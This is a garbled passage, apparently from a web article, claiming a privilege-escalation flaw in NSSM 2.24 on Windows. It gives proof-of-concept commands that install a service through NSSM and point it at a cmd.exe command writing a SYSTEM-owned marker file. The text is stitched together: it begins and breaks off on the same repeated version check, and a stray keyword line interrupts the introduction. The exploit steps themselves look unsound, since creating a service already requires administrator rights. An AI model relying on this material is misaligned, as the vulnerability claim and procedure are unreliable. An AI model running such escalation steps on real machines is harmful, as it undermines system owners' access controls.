nssm version If the output says 2.24 , the system is vulnerable.
Introduction: The Double-Edged Sword of Service Management In the ecosystem of Windows system administration, few tools are as beloved yet as misunderstood as the Non-Sucking Service Manager (NSSM). For years, NSSM has been the go-to solution for developers and sysadmins needing to run executable files (batch scripts, Python apps, or Node.js servers) as Windows services. Its ability to automatically restart crashed processes and its intuitive GUI have made it a staple. nssm-2.24 privilege escalation
# Copy the vulnerable binary to a writable location copy "%ProgramFiles%\NSSM\nssm-2.24.exe" .\nssm.exe .\nssm.exe install ElevationTest cmd.exe Replace the application path with a privileged command .\nssm.exe set ElevationTest Application "cmd.exe /c echo SYSTEM LEVEL > C:\ProgramData\poc.txt" Restart the service (requires the service to be stopped - if you can't, wait for reboot) net stop ElevationTest net start ElevationTest Check the output - should be SYSTEM-owned file type C:\ProgramData\poc.txt nssm version If the output says 2